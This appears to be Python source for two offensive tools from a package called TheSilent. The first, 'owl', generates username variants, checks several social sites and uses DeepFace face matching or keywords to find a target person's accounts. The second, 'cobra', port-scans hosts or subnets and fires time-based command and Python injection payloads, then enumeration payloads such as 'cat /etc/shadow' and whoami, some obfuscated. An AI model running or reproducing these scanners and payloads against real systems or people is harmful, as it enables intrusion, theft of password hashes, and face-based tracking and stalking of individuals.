import io
import numpy as np
import random
import re
import sys
import time
import urllib.parse
from deepface import DeepFace
from itertools import *
from PIL import Image
from selenium import webdriver 
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By
from TheSilent.clear import clear
from TheSilentExt.owl_crawler import owl_crawler
from TheSilent.puppy_requests import text

RED = "\033[1;31m"
CYAN = "\033[1;36m"
GREEN = "\033[0;32m"

def owl(username=None,delay=0,hueristics=False,image=None,keywords=None,sites=None):
    clear()

    try:
        DeepFace.verify(image, image)

    except ValueError:
        print(RED + "we either couldn't identify a face or the target image file doesn't exist")
        sys.exit()
    
    hits = []

    if sites != None and image != None:
        try:
            DeepFace.verify(image, image)

        except:
            print(RED + "either target image doesn't exist or we can't identify any faces")
            sys.exit()
            
        domains_found = []
        with open(sites, "r") as file:
            for i in file:
                domains_found.append(i.replace("\n", "").rstrip("/"))

        for domain in domains_found:
            print(CYAN + f"crawling: {domain}")
            hosts = owl_crawler(domain,delay)
            for host in hosts:
                if ".gif" in host or ".jpeg" in host or ".jpg" in host or ".png" in host or ".webp" in host:
                    time.sleep(delay)
                    try:
                        if DeepFace.verify(image, np.array(Image.open(io.BytesIO(text(i.get_attribute("src"),raw=True)))))["verified"]:
                            hits.append(host)
                    
                    except:
                        pass

    if username != None:
        words = []

        if keywords != None:
            with open(keywords, "r") as file:
                for i in file:
                    words.append(i.replace("\n", ""))
                    

        chrome_options = Options()
        chrome_options.add_argument("--headless=new")
        driver = webdriver.Chrome(options=chrome_options)

        if hueristics:
            users = [username]
            hueristics_list = ["123",
                               "365",
                               "1234",
                               "1776",
                               "1812",
                               "247",
                               "24/7",
                               "czech",
                               "mega",
                               "real",
                               "the",
                               "thereal",
                               "the.real",
                               "the-real",
                               "the_real",
                               "vegan",
                               "zoomer"]

            for i in range(102):
                hueristics_list.append(str(i))

            for i in range(102):
                hueristics_list.append("0" + str(i))

            for i in range(1910,2030):
                hueristics_list.append(str(i))

            spacing = product(".-_/",repeat=username.count(" "))
            for space in spacing:
                space_count = 0
                temp_user = username
                for _ in space:
                    space_count += 1
                    temp_user = temp_user.replace(" ", _, space_count)
                    temp_user = temp_user.replace("/", "")

                users.append(temp_user)

            if re.search("^\s*\S+\s+\S+\s*$", username):
                space_enum = len(re.findall("\s*", username)[0])
                space_str = ""
                for _ in range(space_enum):
                    space_str += " "

                girly_pattern = []
                if username.startswith(" ") and username.endswith(" "):
                    girly_pattern.append(space_str + re.sub("\s{2,}", " ", username.rstrip(" ").lstrip(" ")).split(" ")[0][0] + space_str + re.sub("\s{2,}", " ", username.rstrip(" ").lstrip(" ")).split(" ")[1]+ space_str)
                    girly_pattern.append(space_str + re.sub("\s{2,}", " ", username.rstrip(" ").lstrip(" ")).split(" ")[0][0] + space_str + re.sub("\s{2,}", " ", username.rstrip(" ").lstrip(" ")).split(" ")[1] + re.sub("\s{2,}", " ", username.rstrip(" ").lstrip(" ")).split(" ")[1][-1] + space_str)
                    girly_pattern.append(space_str + re.sub("\s{2,}", " ", username.rstrip(" ").lstrip(" ")).split(" ")[0] + space_str + re.sub("\s{2,}", " ", username.rstrip(" ").lstrip(" ")).split(" ")[1][0] + space_str)

                elif username.startswith(" ") and not username.endswith(" "):
                    girly_pattern.append(space_str + re.sub("\s{2,}", " ", username.rstrip(" ").lstrip(" ")).split(" ")[0][0] + space_str + re.sub("\s{2,}", " ", username.rstrip(" ").lstrip(" ")).split(" ")[1])
                    girly_pattern.append(space_str + re.sub("\s{2,}", " ", username.rstrip(" ").lstrip(" ")).split(" ")[0][0] + space_str + re.sub("\s{2,}", " ", username.rstrip(" ").lstrip(" ")).split(" ")[1] + re.sub("\s{2,}", " ", username.rstrip(" ").lstrip(" ")).split(" ")[1][-1])
                    girly_pattern.append(space_str + re.sub("\s{2,}", " ", username.rstrip(" ").lstrip(" ")).split(" ")[0] + space_str + re.sub("\s{2,}", " ", username.rstrip(" ").lstrip(" ")).split(" ")[1][0])

                elif not username.startswith(" ") and username.endswith(" "):
                    girly_pattern.append(re.sub("\s{2,}", " ", username.rstrip(" ").lstrip(" ")).split(" ")[0][0] + space_str + re.sub("\s{2,}", " ", username.rstrip(" ").lstrip(" ")).split(" ")[1]+ space_str)
                    girly_pattern.append(re.sub("\s{2,}", " ", username.rstrip(" ").lstrip(" ")).split(" ")[0][0] + space_str + re.sub("\s{2,}", " ", username.rstrip(" ").lstrip(" ")).split(" ")[1] + re.sub("\s{2,}", " ", username.rstrip(" ").lstrip(" ")).split(" ")[1][-1] + space_str)
                    girly_pattern.append(re.sub("\s{2,}", " ", username.rstrip(" ").lstrip(" ")).split(" ")[0] + space_str + re.sub("\s{2,}", " ", username.rstrip(" ").lstrip(" ")).split(" ")[1][0] + space_str)

                
                else:
                    girly_pattern.append(re.sub("\s{2,}", " ", username.rstrip(" ").lstrip(" ")).split(" ")[0][0] + space_str + re.sub("\s{2,}", " ", username.rstrip(" ").lstrip(" ")).split(" ")[1])
                    girly_pattern.append(re.sub("\s{2,}", " ", username.rstrip(" ").lstrip(" ")).split(" ")[0][0] + space_str + re.sub("\s{2,}", " ", username.rstrip(" ").lstrip(" ")).split(" ")[1] + re.sub("\s{2,}", " ", username.rstrip(" ").lstrip(" ")).split(" ")[1][-1])
                    girly_pattern.append(re.sub("\s{2,}", " ", username.rstrip(" ").lstrip(" ")).split(" ")[0] + space_str + re.sub("\s{2,}", " ", username.rstrip(" ").lstrip(" ")).split(" ")[1][0])

                for girl in girly_pattern:
                    spacing = product(".-_/",repeat=girl.count(" "))
                    for space in spacing:
                        temp_user = girl
                        space_count = 0
                        for _ in space:
                            space_count += 1
                            temp_user = temp_user.replace(" ", _, space_count)
                            temp_user = temp_user.replace("/", "")

                        users.append(temp_user)

            spacing = [".",
                       "-",
                       "_"]    

            temp_users = users[:]
            for hueristic in hueristics_list:
                for space in spacing:
                    for user in temp_users:
                        users.append(hueristic + space + user)
                        users.append(user + space + hueristic)

        else:
            users = [username.replace(" ", "")]
                        
        users = list(set(users[:]))
        users = random.sample(users, len(users))
        
        contents = {"github": 200,
                    "instagram": "Sorry, this page isn't available.",
                    "poshmark": 200,
                    "vsco": 200}

        urls = {"github": "https://github.com/{}",
                "instagram": "https://www.instagram.com/{}",
                "poshmark": "https://poshmark.com/closet/{}",
                "vsco": "https://vsco.co/{}"}

        for url in urls.items():
            for user in users:
                print(CYAN + "checking: " + url[1].replace("{}", user))
                time.sleep(delay)
                if contents[url[0]] == 200:
                    try:
                        text(url[1].replace("{}", user))
                        skip = False

                    except:
                        skip = True

                    if not skip:
                        if image != None and keywords == None:
                            driver.get(url[1].replace("{}", user))
                            img_elements = driver.find_elements(By.TAG_NAME, "img")
                            for i in img_elements:
                                if i.get_attribute("src") != None:
                                    time.sleep(delay)
                                    try:
                                        if DeepFace.verify(image, np.array(Image.open(io.BytesIO(text(i.get_attribute("src"),raw=True)))))["verified"]:
                                            hits.append(url[1].replace("{}", user))
                                            break
                                    
                                    except:
                                        pass

                        elif keywords != None:
                            driver.get(url[1].replace("{}", user))
                            time.sleep(delay)
                            data = driver.page_source
                            for word in words:
                                if word.lower() in data.lower():
                                    hits.append(url[1].replace("{}", user))

                        else:
                            hits.append(url[1].replace("{}", user))


                else:
                    driver.get(url[1].replace("{}", user))
                    data = driver.page_source
                    if not contents[url[0]] in data:
                        if image != None and keywords == None:
                            img_elements = driver.find_elements(By.TAG_NAME, "img")
                            for i in img_elements:
                                if i.get_attribute("src") != None:
                                    time.sleep(delay)
                                    try:
                                        if DeepFace.verify(image, np.array(Image.open(io.BytesIO(text(i.get_attribute("src"), raw=True)))))["verified"]:
                                            hits.append(url[1].replace("{}", user))
                                            break
                                    
                                    except:
                                        pass

                        elif keywords != None:
                            time.sleep(delay)
                            data = driver.page_source
                            for word in words:
                                if word.lower() in data.lower():
                                    hits.append(url[1].replace("{}", user))

                        else:
                            hits.append(url[1].replace("{}", user))

        driver.quit()

    hits = list(set(hits[:]))
    hits.sort()

    clear()
    if len(hits) > 0:
        for hit in hits:
            print(RED + f"found: {hit}")

    else:
        print(GREEN + f"we didn't find anything interesting")



import ipaddress
import re
import socket
import time
from TheSilent.clear import clear
from TheSilent.dolphin import dolphin

CYAN = "\033[1;36m"
GREEN = "\033[0;32m"
RED = "\033[1;31m"

def cobra(host,delay=0):
    hits = []

    mal_command = [r"sleep 60",
                   r"sleep \6\0"]

    mal_command_enumerate = [r"cat /etc/shadow",
                             r"cat \/\e\t\c/\s\h\ad\o\w",
                             r"ls -l -a",
                             r"\l\s",
                             r"pwd",
                             r"\p\w\d",
                             r"whoami",
                             r"\w\h\o\a\m\i"]

    mal_emoji = ["\U0001F600",
                 "\U0001F47C",
                 "\U0001F525"]

    mal_python = [r"time.sleep(60)",
                  r"eval(compile('import time\ntime.sleep(60)','cobra','exec'))",
                  r"eval(compile('import os\nos.system('sleep 60')','cobra','exec'))",
                  r"__import__('time').sleep(60)",
                  r"__import__('os').system('sleep 60')",
                  r'eval("__import__(\'time\').sleep(60)")',
                  r'eval("__import__(\'os\').system(\'sleep 60\')")',
                  r'exec("__import__(\'time\').sleep(60)")',
                  r'exec("__import__(\'os\').system(\'sleep 60\')")',
                  r'exec("import time\ntime.sleep(60)"',
                  r'exec("import os\nos.system(\'sleep 60\')")']

    mal_python_enumerate = [r"eval(compile('import os\nos.system('cat /etc/shadow')','cobra','exec'))",
                            r"eval(compile('import os\nos.system('cat \/\e\t\c/\s\h\ad\o\w')','cobra','exec'))",
                            r"eval(compile('import os\nos.system('ls -l -a')','cobra','exec'))",
                            r"eval(compile('import os\nos.system('\l\s')','cobra','exec'))",
                            r"eval(compile('import os\nos.system('pwd')','cobra','exec'))",
                            r"eval(compile('import os\nos.system('\p\w\d')','cobra','exec'))",
                            r"eval(compile('import os\nos.system('whoami')','cobra','exec'))",
                            r"eval(compile('import os\nos.system('\w\h\o\a\m\i')','cobra','exec'))",
                            r"__import__('os').system('cat /etc/shadow')",
                            r"__import__('os').system('cat \/\e\t\c/\s\h\ad\o\w')",
                            r"__import__('os').system('ls -l -a')",
                            r"__import__('os').system('\l\s')",
                            r"__import__('os').system('pwd')",
                            r"__import__('os').system('\p\w\d')",
                            r"__import__('os').system('whoami')",
                            r"__import__('os').system('\w\h\o\a\m\i')",
                            r'eval("__import__(\'os\').system(\'cat /etc/shadow\')")',
                            r'eval("__import__(\'os\').system(\'cat \/\e\t\c/\s\h\ad\o\w\')")',
                            r'eval("__import__(\'os\').system(\'ls -l -a\')")',
                            r'eval("__import__(\'os\').system(\'\l\s\')")',
                            r'eval("__import__(\'os\').system(\'pwd\')")',
                            r'eval("__import__(\'os\').system(\'\p\w\d\')")',
                            r'eval("__import__(\'os\').system(\'whoami\')")',
                            r'eval("__import__(\'os\').system(\'\w\h\o\a\m\i\')")',
                            r'exec("__import__(\'os\').system(\'cat /etc/shadow\')")',
                            r'exec("__import__(\'os\').system(\'cat \/\e\t\c/\s\h\ad\o\w\')")',
                            r'exec("__import__(\'os\').system(\'ls -l -a\')")',
                            r'exec("__import__(\'os\').system(\'\l\s\')")',
                            r'exec("__import__(\'os\').system(\'pwd\')")',
                            r'exec("__import__(\'os\').system(\'\p\w\d\')")',
                            r'exec("__import__(\'os\').system(\'whoami\')")',
                            r'exec("__import__(\'os\').system(\'\w\h\o\a\m\i\')")',
                            r'exec("import os\nos.system(\'cat /etc/shadow\')")',
                            r'exec("import os\nos.system(\'cat \/\e\t\c/\s\h\ad\o\w\')")',
                            r'exec("import os\nos.system(\'ls -l -a\')")',
                            r'exec("import os\nos.system(\'\l\s\')")',
                            r'exec("import os\nos.system(\'pwd\')")',
                            r'exec("import os\nos.system(\'\p\w\d\')")',
                            r'exec("import os\nos.system(\'whoami\')")',
                            r'exec("import os\nos.system(\'\w\h\o\a\m\i\')")']


    clear()
    
    # subnet
    if re.search("^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/\d{1,2}$",host):
        subnet = list(ipaddress.ip_network(host,strict=False).hosts())
        for ip in subnet:
            ip = str(ip)
            print(CYAN + f"port scanning {ip}")
            time.sleep(delay)
            ports = dolphin(ip)
            for port in ports:
                print(CYAN + f"checking: {ip}:{port}")
                for mal in mal_command:
                    time.sleep(delay)
                    tcp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                    tcp_socket.settimeout(120)
                    try:
                        tcp_socket.connect((ip, port))
                        tcp_socket.send(mal.encode())
                        start = time.time()
                        data = tcp_socket.recv(65535)
                        end = time.time()
                        if end - start >= 45:
                            for mal_enum in mal_command_enumerate:
                                time.sleep(delay)
                                tcp_socket.send(mal_enum.encode())
                                data = tcp_socket.recv(65535)
                                tcp_socket.close()
                                if len(data) > 0:
                                    if not re.search("^HTTP/1\.[0-2]\s+4[0-9]{1,2}",data):
                                        hits.append(f"command injection in {ip}:{port} (payload: {mal_enum})- {data}")

                        tcp_socket.close()

                    except:
                        pass

                for mal in mal_emoji:
                    time.sleep(delay)
                    tcp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                    tcp_socket.settimeout(15)
                    try:
                        tcp_socket.connect((host, port))
                        tcp_socket.send(mal.encode())
                        data = tcp_socket.recv(65535)
                        tcp_socket.close()
                        if len(data) > 0:
                            if not re.search("^HTTP/1\.[0-2]\s+4[0-9]{1,2}",data):
                                hits.append(f"emoji injection in {ip}:{port} (payload: {mal})- {data}")

                    except:
                        pass

                for mal in mal_python:
                    time.sleep(delay)
                    tcp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                    tcp_socket.settimeout(120)
                    try:
                        tcp_socket.connect((ip, port))
                        tcp_socket.send(mal.encode())
                        start = time.time()
                        data = tcp_socket.recv(65535)
                        end = time.time()
                        if end - start >= 45:
                            for mal_enum in mal_python_enumerate:
                                time.sleep(delay)
                                tcp_socket.send(mal_enum.encode())
                                data = tcp_socket.recv(65535)
                                if len(data) > 0:
                                    if not re.search("^HTTP/1\.[0-2]\s+4[0-9]{1,2}",data):
                                        hits.append(f"emoji injection in {ip}:{port} (payload: {mal_enum})- {data}")

                        tcp_socket.close()

                    except:
                        pass

    # single host  
    else:
        print(CYAN + "port scanning")
        ports = dolphin(host)
        for port in ports:
            print(CYAN + f"checking: {port}")
            for mal in mal_command:
                time.sleep(delay)
                tcp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                tcp_socket.settimeout(120)
                try:
                    tcp_socket.connect((host, port))
                    tcp_socket.send(mal.encode())
                    start = time.time()
                    data = tcp_socket.recv(65535)
                    end = time.time()
                    if end - start >= 45:
                        for mal_enum in mal_command_enumerate:
                            time.sleep(delay)
                            tcp_socket.send(mal_enum.encode())
                            data = tcp_socket.recv(65535)
                            tcp_socket.close()
                            if len(data) > 0:
                                if not re.search("^HTTP/1\.[0-2]\s+4[0-9]{1,2}",data):
                                    hits.append(f"command injection in port {port}:{mal_enum}- {data}")

                    tcp_socket.close()

                except:
                    pass

            for mal in mal_emoji:
                time.sleep(delay)
                tcp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                tcp_socket.settimeout(15)
                try:
                    tcp_socket.connect((host, port))
                    tcp_socket.send(mal.encode())
                    data = tcp_socket.recv(65535)
                    tcp_socket.close()
                    if len(data) > 0:
                        if not re.search("^HTTP/1\.[0-2]\s+4[0-9]{1,2}",data):
                            hits.append(f"emoji injection in port {port}:{mal}- {data}")

                except:
                    pass

            for mal in mal_python:
                time.sleep(delay)
                tcp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                tcp_socket.settimeout(120)
                try:
                    tcp_socket.connect((host, port))
                    tcp_socket.send(mal.encode())
                    start = time.time()
                    data = tcp_socket.recv(65535)
                    end = time.time()
                    if end - start >= 45:
                        for mal_enum in mal_python_enumerate:
                            time.sleep(delay)
                            tcp_socket.send(mal_enum.encode())
                            data = tcp_socket.recv(65535)
                            if len(data) > 0:
                                if not re.search("^HTTP/1\.[0-2]\s+4[0-9]{1,2}",data):
                                    hits.append(f"python injection in port {port}:{mal_enum}- {data}")

                    tcp_socket.close()

                except:
                    pass

    clear()
    hits = list(set(hits[:]))
    hits.sort()

    if len(hits) > 0:
        for hit in hits:
            print(RED + hit)

    else:
        print(GREEN + f"we didn't find anything interesting on {host}")
